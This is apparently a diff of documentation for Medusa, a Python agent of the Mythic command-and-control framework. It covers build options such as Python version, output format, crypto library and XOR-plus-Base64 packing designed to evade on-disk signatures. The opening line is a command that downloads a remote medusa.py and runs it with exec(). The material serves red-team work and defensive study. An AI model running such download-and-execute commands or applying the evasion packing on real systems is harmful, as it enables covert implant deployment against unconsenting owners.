MythicAgents/Medusa/documentation-payload/medusa/_index.md

 python -c "import urllib2;exec(urllib2.urlopen('https://[REMOTE_HOST]/medusa.py').read())" &
 ```

+### Build Options

+This section provides details of what each Medusa-specific build option provides

+#### Python Version

+Pretty self-explanatory, select which version of Python the Medusa agent should be created for.
+See the Development section for details of how this works under the hood.

+#### Output Format

+Mythic can provide the final agent code as a Python script, or as a Base64-encoded blob.
+Note that this is the last stage of the process effectively.
+So any XOR obfuscation, crypto library selection or Python version selection will take place before this.

+#### Cryptography library

+Medusa agents can be built using either a manual crypto implementation or using the non-default `cryptography` library.
+Given, the manual implementation isn't going to be as quick or efficient as the main Python library (not to mention the extra code required), `cryptography` use might be the way to go.
+Though do bear in mind, it is not a default library and appears to only be installed on macOS by default.

+{{% notice info %}}
+ Either option here won't affect the agents ability to use encrypted comms, it is purely to specify how the encrypted comms are achieved.
+{{% /notice %}}

+#### XOR and Base64-encode

+Finally, the plaintext Medusa script can be encrypted via XOR with a randomly-generated key, before being Base64 encoded.
+This blob is then wrapped with an unpacker and put in a `exec()` function to ultimately run the Medusa agent.
+This is designed to make the agent less signaturable when on-disk.
+See the OPSEC section for more details.

 ### Important Notes
 Each job is executed in a new thread.
 Long-running jobs can be viewed with the `jobs` command and, where a 'stop' functionality has been implemented, they can be killed with `jobkill`.